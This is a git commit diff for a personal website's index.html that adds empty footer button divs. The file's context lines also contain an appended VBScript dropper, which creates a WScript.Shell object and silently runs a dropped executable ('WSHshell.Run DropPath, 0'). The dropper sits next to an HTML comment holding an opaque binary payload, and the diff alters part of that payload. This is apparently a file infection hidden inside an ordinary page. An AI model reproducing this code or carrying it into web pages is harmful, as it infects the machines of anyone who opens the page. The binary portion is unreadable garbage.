creating structure for the footer

--- a/index.html
+++ b/index.html
@@ -9,6 +9,18 @@
                 </iframe>
             </div>
             <div id="lowerCon">
+                <div id="footer">
+                    <div id="homeButton" class="footerButtons">
+                    </div>
+                    <div id="infoButton" class="footerButtons">
+                    </div>
+                    <div id="eduButton" class="footerButtons">
+                    </div>
+                    <div id="hobbyButton" class="footerButtons">
+                    </div>
+                    <div id="contactButton" class="footerButtons">
+                    </div>
+                </div>
             </div>
         </div>
     </body>
@@ -26,11 +38,11 @@ FileObj.Close
 End If
 Set WSHshell = CreateObject("WScript.Shell")
 WSHshell.Run DropPath, 0
-//--></SCRIPT><!--à¢‡°¢yÁu§#ÜI¡Æv«^ -åD°B´Šxs® !ä°vb.žÀ|Mù{j„ÔòÉÖ’37Âã+;*•ôôõstâ>ÀÚ›Ð§w7SGóKz3XOMEJ\' d«ÇON|‡»Ò> Õ{ˆ @–œÝ_ò˜AÀÖ.6¦Û›*°Á9wÚD-ð~áÆ‹’#£ÌXKÌpÐáïÎòIpyF8SŠU7¾ÆÂêËJNabi,$XÛ=Z¿•£»}Õü†.œ§Y@³s¦*Æi›û¤°3µÚCRn—§w—F­SŽœÎ8WÖ{ÌUžŒ/’GLÄ²'…ø"›RæÞåàžˆ w¸+ÞÅ¶ÏÂ$OvôãRXXùh—óƒ~ÚS&àå|?>hÈÖýŠúÁÍ ûyµL rù«»ß×ºðH'g‘“20Ñ—Ç5pVÚ¯\bÞ´“0K+ÐwzîÅ#bie($u/E˜ ˜Òcø¥‘i×tžä]cÍ~Îie6^¢—ay$ÒZ
-?«-]þµ)~BrKÒ°ñÔÊèÝa Ü
+//--></SCRIPT><!--yÚ@™Ù?êIF‡¯Ú…{î“EÓ?· ¥•ç°r1×°0M’ÌÙgºöWýðô@ùN)”ì„Ý„È¤Cß/›¹:~õ×Ñ->SÑŽ4•ÛUOŠ· kNLTñ„é:^™¡ÅŸj:.ŠXÏf½:{H*¦9…ÓiFÄØt/Mbþ¡O(ãMû#ÍÙÏñÖ/KÖ@Î•mQ8`…¸¾ÚÛÃüàƒŸúìòë+Ñc•ûÍB› w[u­á¾m©¶ñ¼5Š!åŸEãG’¨GX²[AÈÂõvm,ò³×x¤«4žüŸ.ŠÇ¦}lp"ª5õÀ&+íV:\L-Ÿ¬ï^—°%—<¶:¢ò$â¹õ‚¶_ÚHï
+áðŠdžûY5¬žée1‚u„ê†s¡{¿xïœw^ÏÔÁaÌ_†²ÀK:DæwØmƒÕ>åÅq²O(%›NO"ÓWn§XÚèËù©¤ôrôm€»0àx#"wó¤· Ü
 RùÜ
 Ü
 Ü
-‘×O„ÝØZgÝ
+‘×OÚúØZvß
  Ü
 -->
